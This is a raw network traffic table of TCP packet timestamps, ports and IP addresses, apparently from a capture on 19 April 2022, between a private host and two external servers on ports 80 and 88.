Apr 19, 2022 16:44:47.802596092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.802753925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.802797079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.802819967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.802839041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.802915096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.803117037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.803159952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.803199053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.803266048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.803477049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.803513050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.803539038 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.803545952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.803760052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.803796053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.803819895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.803828001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.803850889 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.803988934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.804244995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.804280043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.804307938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.804313898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.804337025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.804554939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.804591894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.804626942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.804650068 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.804677963 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.804908037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.804946899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.804980040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.805035114 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.805280924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.805315971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.805337906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.805349112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.805571079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.805607080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.805627108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.805639982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.805659056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.805916071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.805951118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.805984020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.806015968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.806057930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.806258917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.806293964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.806329012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.806389093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.806508064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.806543112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.806564093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.806843042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.806879044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.806912899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.806941032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.806978941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.807207108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.807243109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.807275057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.807329893 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.807576895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.807611942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.807640076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.807645082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.807965040 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.807971954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.808008909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.808089018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.808123112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.808146000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.808157921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.808182955 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.808250904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.808540106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.808573961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.808607101 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.808607101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.808650017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.808962107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.808995008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.809029102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.809062004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.809102058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.809597015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.809633970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.809668064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.809724092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.810251951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.810287952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.810312033 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.810808897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.810846090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.810894012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.810909033 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.810954094 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.811372042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.811408997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.811441898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.811503887 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.811662912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.811697960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.811722994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.811732054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.811964035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.811970949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.812005043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.812273979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.812308073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.812342882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.812360048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.812402010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.812607050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.812642097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.812674999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.812711954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.812733889 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.812951088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.812987089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.813019991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.813055038 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.813278913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.813304901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.813329935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.813364983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.813404083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:47.814246893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.814270020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:47.814325094 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.051641941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.347393990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.347418070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.347547054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.347593069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.347599983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.347656965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.347738981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.347861052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.347961903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.348033905 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.348083973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.348133087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.348210096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.348278046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.348406076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.348449945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.348603964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.348648071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.348663092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.348767042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.348845005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.348890066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.348985910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.349030972 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.349102974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.349244118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.349345922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.349392891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.349450111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.349493980 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.349544048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.349704027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.349783897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.349834919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.349982977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.350027084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.350058079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.350122929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.350188017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.350224018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.350415945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.350455999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.350502014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.350579977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.350625038 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.350684881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.350778103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.350907087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.350951910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.351089001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.351131916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.351138115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.351304054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.351368904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.351413012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.351491928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.351536036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.351584911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.351744890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.351799965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.351844072 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.351931095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.351974964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.352010965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.352186918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.352247953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.352292061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.352369070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.352412939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.352466106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.352586985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.352694035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.352736950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.352812052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.352854967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.352989912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.353050947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.353157043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.353199959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.353276014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.353321075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.353383064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.353507042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.353605986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.353658915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.353708029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.353750944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.353832006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.353944063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.354054928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.354108095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.354177952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.354286909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.354346037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.354413033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.354461908 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.354525089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.354655981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.354748964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.354811907 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.354873896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.354926109 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:48.354974031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.355084896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.355197906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:48.355263948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:45:02.764801979 CEST	49767	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:45:03.053472042 CEST	80	49767	45.135.48.153	192.168.2.4
Apr 19, 2022 16:45:03.053653002 CEST	49767	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:45:03.054878950 CEST	49767	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:45:03.343389034 CEST	80	49767	45.135.48.153	192.168.2.4
Apr 19, 2022 16:45:03.347311020 CEST	49768	80	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:03.527268887 CEST	49767	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:45:03.640701056 CEST	80	49768	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:03.640877962 CEST	49768	80	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:03.641254902 CEST	49768	80	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:03.934555054 CEST	80	49768	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:04.027229071 CEST	49768	80	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:05.320135117 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:05.609359026 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:05.609606981 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:05.609936953 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:05.899080992 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:05.910151958 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:06.203747034 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:06.203795910 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:06.203985929 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:06.336380005 CEST	49768	80	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:06.466101885 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:06.630842924 CEST	80	49768	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:06.631278038 CEST	49768	80	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:06.755173922 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:06.755536079 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:06.925211906 CEST	80	49768	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:07.027484894 CEST	49768	80	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:07.052985907 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:07.053024054 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:07.053198099 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:10.002204895 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:10.291496992 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:10.292654991 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:10.595854044 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:10.595901012 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:10.596002102 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:13.060781002 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:13.350055933 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:13.351871014 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:13.645298958 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:13.645349979 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:13.645518064 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:16.075954914 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:16.365051985 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:16.366740942 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:16.663182974 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:16.663225889 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:16.663321972 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:19.771356106 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:20.060776949 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:20.061098099 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:20.355366945 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:20.355413914 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:20.355567932 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:23.014915943 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:23.306710005 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:23.307061911 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:23.602921963 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:23.602963924 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:23.603055954 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:26.671067953 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:26.960305929 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:26.960624933 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:27.257553101 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:27.257601023 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:27.257667065 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:29.654850006 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:29.944087029 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:29.944516897 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:30.252226114 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:30.252274036 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:30.252351046 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:32.625231028 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:32.914465904 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:32.914916992 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:33.224149942 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:33.224205017 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:33.227974892 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:35.841542959 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:36.130810976 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:36.195605993 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:36.438806057 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:36.440391064 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:36.535394907 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:36.831617117 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:36.831665993 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:36.831752062 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:40.597845078 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:40.887056112 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:40.888933897 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:41.192748070 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:41.192795038 CEST	88	49769	113.212.88.126	192.168.2.4
